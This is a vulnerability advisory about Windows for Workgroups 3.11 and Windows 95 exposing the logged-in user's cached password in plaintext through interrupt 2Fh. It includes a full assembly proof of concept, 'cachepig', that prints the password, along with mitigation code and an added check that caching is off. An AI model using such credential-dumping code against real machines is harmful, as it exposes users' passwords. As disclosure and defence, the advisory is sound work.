COMMAND
net.exe
SYSTEMS AFFECTED
WfW 3.x, Win9x
PROBLEM
'bt398' found the following. With net.exe, a user can set up the
network drivers (Windows for Workgroups protocol); moreover, a user
can log in (open a WfW session) and also change his password. As
this program runs under DOS, the question is how net.exe retrieves
the user's password; since no DLL calls to undocumented functions
are possible, only a call to a special interrupt/function can be
used.
When a user changes his password, net.exe accesses the old
password through the multiplex interrupt 2fh (the so-called software
interrupt) with function 11h (sub-function 84h). 'bt398' supposes
that function 11XX of int 2fh is installed by the Windows kernel so
that it can exchange data (WfW infos) with a DOS program. You would
expect this function to take the password as input and return an
error if the password is wrong.. but no.. Microsoft did it the other
way round. The function returns the unencrypted password into a
buffer (... no comment). Indeed, this is not a _big_ deal, but if a
user has access to your computer after you logged in, he can easily
retrieve your password.. A lot of people use the same password for
their mail and their Windows login (so it is somewhat a security
problem). Below is a small program that prints the password of the
logged-in user (you must have logged in first); this only works on
Windows for Workgroups 3.11 and Windows 95.
You'll find source and exe (MIME-attached):
; Netscape got the cached cow.. so Microsoft got the cached pig.
;
; caching password in memory is not a good thing to do (security talking):
;
;   mov ax, 1184h          ; 3 +
;   mov bl, 0eh            ; 2 +
;   mov cx, 0fh            ; 3 +
;   mov di, ans_password   ; 3 +
;   int 2fh                ; 2 = 13 bytes
;
; compile : nasm -f bin -o cachepig.com cachepig.asm

        bits 16                 ; 640 Kb addressing mode
        org 0x100               ; good old .COM file

DOS     EQU 21h
MPLX    EQU 2fh                 ; multiplex int

section .text
        mov dx, banner
        call Display

        mov bl, 05h             ; sub-function 05h : workgroup name
        mov di, ans_workgroup
        call Get_Infos
        mov di, str_workgroup
        mov dx, di
        call Make_Str
        call Display

        mov bl, 03h             ; sub-function 03h : "login" (actually the computer name, see below)
        mov di, ans_login
        call Get_Infos
        mov di, str_login
        mov dx, di
        call Make_Str
        call Display

        mov bl, 0eh             ; sub-function 0eh : cached password
        mov di, ans_password
        call Get_Infos
        mov di, str_password
        mov dx, di
        call Make_Str
        call Display

        mov ax, 4C00h           ; exit to DOS
        int DOS

Display:                        ; print the '$'-terminated string at ds:dx
        mov ah, 09h
        int DOS
        ret

Make_Str:                       ; find the end of the answer and append CR LF '$' 0
        cld
        mov cx, 12+64-4         ; 12-byte label + 64-byte answer, minus the terminator
        xor al, al
        repne scasb             ; scan es:di for the first 0 byte
        mov dword [es:di-1], 00240a0dh
        ret

Get_Infos:                      ; int 2fh, ax=1184h, bl=item, es:di=answer buffer
        mov ax, 1184h
        mov cx, 0fh             ; only needed for bl=0eh : max length of password
        int MPLX
        ret

section .data
banner        db 'cachepig - ga <duncan@mygale.org>', 0dh, 0ah, 0dh, 0ah, 24h
str_workgroup db 'workgroup : '
ans_workgroup times 64 db 0h
str_login     db 'login     : '
ans_login     times 64 db 0h
str_password  db 'password  : '
ans_password  times 64 db 0h
The executable was also attached as a base64-encoded cachepig.com.
Btw, the "login" returned by cachepig is not the login name _but_
the computer's name. Anyway, the login name can be easily retrieved.
SOLUTION
Windows NT is not affected. The following code seems to disable the
password caching feature:
        mov ax, 1184h           ; same int 2fh interface as above
        mov bx, 0dh             ; sub-function 0dh : password caching control
        xor cx, cx              ; cx=0 : turn caching off
        int 2fh
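As an added example (not from the original report or from 'bt398'), a small .COM file that applies the call above and then probes the password slot the way cachepig does, reporting only whether anything is still cached and never the value itself; it assumes the int 2fh/1184h semantics inferred above, and the file name and labels are made up.

```nasm
; cachecheck.asm - added example, not part of the original report.
; Build: nasm -f bin -o cachecheck.com cachecheck.asm
; Assumes the int 2fh/ax=1184h behaviour inferred above (bl=0dh, cx=0
; disables caching; bl=0eh copies the cached password to es:di).
        bits 16
        org 0x100

DOS     equ 21h
MPLX    equ 2fh                 ; multiplex int

section .text
start:
        ; 1. ask the WfW layer to stop caching the password (SOLUTION call)
        mov ax, 1184h
        mov bx, 0dh
        xor cx, cx
        int MPLX

        ; 2. probe the password slot into a zero-filled buffer
        mov ax, 1184h
        mov bl, 0eh
        mov cx, 0fh             ; max password length, as in cachepig
        mov di, probe
        int MPLX

        ; 3. report presence only; the value itself is never displayed
        mov dx, msg_clear
        cmp byte [probe], 0     ; still zero -> nothing was copied back
        je  report
        mov dx, msg_cached
report:
        mov ah, 09h
        int DOS

        ; 4. scrub our own copy so it does not linger in memory either
        mov di, probe
        mov cx, 16
        xor al, al
        cld
        rep stosb

        mov ax, 4C00h
        int DOS

section .data
msg_clear  db 'password slot empty: caching disabled or no password set', 0dh, 0ah, '$'
msg_cached db 'password still cached: caching NOT disabled', 0dh, 0ah, '$'
probe      times 16 db 0        ; 0fh bytes max + terminator
```

An empty slot is also what an account with no password returns, so "slot empty" on its own does not prove the call took effect; compare against a run without step 1 on the same account.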